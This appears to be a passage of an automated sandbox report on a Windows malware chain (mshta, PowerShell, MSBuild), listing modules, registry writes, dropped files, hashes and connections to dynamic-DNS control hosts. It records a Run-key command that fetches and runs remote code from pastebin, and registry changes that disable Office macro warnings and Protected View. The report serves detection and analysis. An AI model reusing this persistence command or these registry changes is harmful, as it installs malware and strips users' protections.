c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\winsta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
2104
CMD
"{path}"
Path
C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
MSBuild.exe
Version
2.0.50727.5420 built by: Win7SP1
Modules
Image
c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.drawing\dbfe8642a8ed7b2b103ad28e0c96418a\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.windows.forms\3afcd5168c7a6cb02eab99d7fd71e102\system.windows.forms.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.visualbas#\08d608378aa405adc844f3cf36974b8c\microsoft.visualbasic.ni.dll
c:\windows\system32\uxtheme.dll
c:\windows\assembly\gac_msil\system.windows.forms\2.0.0.0__b77a5c561934e089\system.windows.forms.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\shfolder.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll

Registry activity

Total events
669
Read events
498
Write events
171
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
3952
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3952
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3952
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3952
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000077000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
3952
mshta.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
LanguageList
en-US
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000078000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2632
mshta.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
LanguageList
en-US
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
AvastUpdate
mshta.exe http://pastebin.com/raw/0zUiMTze
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\PowerPoint\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\PowerPoint\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security
VBAWarnings
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\ProtectedView
DisableUnsafeLocationsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView
DisableUnsafeLocationsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView
DisableUnsafeLocationsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\ProtectedView
DisableUnsafeLocationsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView
DisableUnsafeLocationsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView
DisableUnsafeLocationsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\ProtectedView
DisableUnsafeLocationsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView
DisableUnsafeLocationsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView
DisableUnsafeLocationsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Security\ProtectedView
DisableUnsafeLocationsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView
DisableUnsafeLocationsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView
DisableUnsafeLocationsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\ProtectedView
DisableUnsafeLocationsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView
DisableUnsafeLocationsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView
DisableInternetFilesInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView
DisableAttachementsInPV
1
2632
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView
DisableUnsafeLocationsInPV
1
3720
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
LanguageList
en-US
3720
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3720
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3720
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3720
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3720
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3720
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3720
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3720
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3720
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3720
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3720
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3720
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
2104
MSBuild.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
TCP Monitor
C:\Users\admin\AppData\Roaming\90059C37-1320-41A4-B58D-2B75A9850D2F\TCP Monitor\tcpmon.exe

Files activity

Executable files
1
Suspicious files
4
Text files
23
Unknown types
0

Dropped files

PID
Process
Filename
Type
2104
MSBuild.exe
C:\Users\admin\AppData\Roaming\90059C37-1320-41A4-B58D-2B75A9850D2F\TCP Monitor\tcpmon.exe
executable
MD5: 1f13cd7f1ecb2a7bcc1ff5e287b7eb2e
SHA256: 6adc88fc0a0e108851909618442c03f57cdfc20f6db4ee88b84c0caf420f991f
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\error[1]
html
MD5: 16aa7c3bebf9c1b84c9ee07666e3207f
SHA256: 7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754
3720
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16798a.TMP
binary
MD5: 53c936f15ba0e898ca1bdceb3ae9c5fb
SHA256: d7c26fc9ff2065d126d4339d2c20d865b8b2a8399ab7f0a1a3b06f7ad1a36c95
3720
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 53c936f15ba0e898ca1bdceb3ae9c5fb
SHA256: d7c26fc9ff2065d126d4339d2c20d865b8b2a8399ab7f0a1a3b06f7ad1a36c95
3720
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LZY4SIKB9W7NO2CS8I4D.temp
––
MD5:  ––
SHA256:  ––
2632
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\LhpqPv66[1].txt
html
MD5: b28affe02fc84afedbf60d4fa2b7a33a
SHA256: d01f745202e9e9d5b381da37aff123ff4d797a2c7e359e8dd7a7c80277db226c
2632
mshta.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: f8ddfb2732f917f714fd74f1cf3b9f8b
SHA256: a9d321016a42e2b98155c0bbe44307c7b1bda4e5e0d6e817cabecfa6c271b386
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\navbar[1].g
––
MD5:  ––
SHA256:  ––
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\warning[1]
image
MD5: 124a9e7b6976f7570134b7034ee28d2b
SHA256: 5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\error[1]
text
MD5: 35fe91c2ac1ba0913cc617622b9eb43f
SHA256: 966240c0527b20e8e2553b7e5a68594ae69230aa00186f2c6c2c342405494837
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\logo-16[1].png
image
MD5: 5ffecab6c722bb0adc3fce8d83b27993
SHA256: cca664ca16fde285160e80eae6ba4501c27b1dd1ce09aec1e84caa74b5baff53
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\share_buttons_20_3[1].png
image
MD5: ad9999106d5f550920b586e8e1704e5a
SHA256: 3829a5b2ade7cfc416c80b8f3df71e49e68672875f025d525223978f5cee3fd3
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\warning[1]
––
MD5:  ––
SHA256:  ––
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\error[1]
––
MD5:  ––
SHA256:  ––
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\cb=gapi[1].loaded_3
text
MD5: 5c2b6131b59b6397a81f1ed46ba585fe
SHA256: a2996100c95e3166c48c9cab4f56485c23efff0dde1dd4e51069203d4a3bc58a
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\8[1].html
html
MD5: 5d9434c53de484260e658001e71df812
SHA256: a1950f682e83af4b3a5ad6e0a46fa9ec3b4f331d4748180e2a4165a3c6c9e432
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\cb=gapi[1].loaded_2
text
MD5: dfca983f4b2afd0472667416b99e0f9a
SHA256: b88d9432a00cfa0d6cfdc1f55ad27e75b029b638075c68e1de32eb5a5dc0b943
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\icon18_edit_allbkg[1].gif
image
MD5: c991641178ff05adf0d004298b5eafa9
SHA256: ca9848e6006cfec8f9ffa29433ade8152204bdb95579200831c6dc0f53dff70b
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\body_gradient_tile_light[1].png
image
MD5: 3b2a20d5b0ba4ca0c5dd90865ad6b9c4
SHA256: 0fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\f[1].txt
text
MD5: 7f5f2be159837d73b72a4b37616bce44
SHA256: ccecd185ac16ba0a538840f37701053fbb861f7fbbdd86039c7415fcd924d1f2
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\cb=gapi[1].loaded_1
text
MD5: 3046a593032c278f7f52826c7c4cfd3b
SHA256: 270910e368e3e8eaf6b7292f9950778cb4cb1fb81093abdbbc8247449f15d265
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\1501421786-widgets[1].js
text
MD5: 65cab1da9a68d9fc06c0ceea26e1879f
SHA256: 75033e75836de28af64fa0abcdeec178df9db9446a09bea2a8e9e72958466b4b
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\cookienotice[1].js
text
MD5: a705132a2174f88e196ec3610d68faa8
SHA256: 068ffe90977f2b5b2dc2ef18572166e85281bd0ecb31c4902464b23db54d2568
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\cb=gapi[1].loaded_0
text
MD5: bfa01245364b163772bfa3067c5dd6c3
SHA256: e15c2b291ba23bb646ca27e52853b1fb305b60e1ef40c51530b8a2b18bdcff82
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\1646370754-comment_from_post_iframe[1].js
html
MD5: 9ee08ad2448d931c3350f8efb31b9583
SHA256: 045a89da56e925603d6ae87bd25c68a06487b706cb75cd41138614995118d32e
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\authorization[1].css
binary
MD5: 68b329da9893e34099c7d8ad5cb9c940
SHA256: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\plusone[1].js
html
MD5: 5c7a692db43dd1e7299db0274a7559e9
SHA256: 941a23db972131dde66171968f6b847416dfe037e9f3a143f2b9c729b41a625c
3952
mshta.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 44818242875d0a2e462858428d9ac4aa
SHA256: dc4f4a342b1a19951f169cfa3eb7be1be1de9cb30f38d2a4cc82472282ee8912
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\3399642339-ieretrofit[1].js
html
MD5: be2b0433b22d6fc049f1b2d75daaf7fa
SHA256: 7186786ed5a17b3db11b7be7b4eff0e2a95fde616d81e68fee6530f7523fb6e9
3952
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\3597120983-css_bundle_v2[1].css
text
MD5: ac004ad1eafc60b54fed8371c9c33fbc
SHA256: 869176cab64c36f92c6c1f8ffbe85919575d6b9995a54850e5925289f3a75078
2104
MSBuild.exe
C:\Users\admin\AppData\Roaming\90059C37-1320-41A4-B58D-2B75A9850D2F\run.dat
binary
MD5: 25e5bf700c76d46907917ba13793034b
SHA256: 685a90f7ba4b6f4be42661ec6fd00d212708c732fda4bf9bc055d2c6b51efff6

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
1
TCP/UDP connections
51
DNS requests
33
Threats
15

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
2632 mshta.exe GET 301 104.20.208.21:80 http://www.pastebin.com/raw/LhpqPv66 US
html
shared

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
3952 mshta.exe 172.217.23.129:443 Google Inc. US whitelisted
3952 mshta.exe 172.217.21.233:443 Google Inc. US whitelisted
3952 mshta.exe 172.217.21.206:443 Google Inc. US whitelisted
3952 mshta.exe 172.217.16.162:443 Google Inc. US whitelisted
3952 mshta.exe 216.58.210.9:443 Google Inc. US whitelisted
3952 mshta.exe 172.217.16.173:443 Google Inc. US whitelisted
3952 mshta.exe 172.217.18.99:443 Google Inc. US whitelisted
2632 mshta.exe 104.20.208.21:80 Cloudflare Inc US shared
2632 mshta.exe 104.20.209.21:443 Cloudflare Inc US shared
3720 powershell.exe 104.20.209.21:443 Cloudflare Inc US shared
2104 MSBuild.exe 8.8.8.8:53 Google Inc. US whitelisted
2104 MSBuild.exe 197.210.226.159:10123 MTN NIGERIA Communication limited NG unknown
–– –– 8.8.8.8:53 Google Inc. US whitelisted
2104 MSBuild.exe 185.56.90.78:10123 Buzinessware FZCO AE unknown
2104 MSBuild.exe 8.8.4.4:53 Google Inc. US whitelisted

DNS requests

Domain IP Reputation
asdadwnixwed.blogspot.com 172.217.23.129
whitelisted
www.blogger.com 172.217.21.233
whitelisted
apis.google.com 172.217.21.206
whitelisted
pagead2.googlesyndication.com 172.217.16.162
whitelisted
resources.blogblog.com 216.58.210.9
unknown
accounts.google.com 172.217.16.173
shared
www.gstatic.com 172.217.18.99
whitelisted
www.pastebin.com 104.20.208.21
104.20.209.21
shared
pastebin.com 104.20.209.21
104.20.208.21
shared
officewk.duckdns.org 197.210.226.159
malicious
officewk2020.hopto.org 185.56.90.78
malicious

Threats

PID Process Class Message
2632 mshta.exe Misc activity SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain

Debug output strings

No debug info.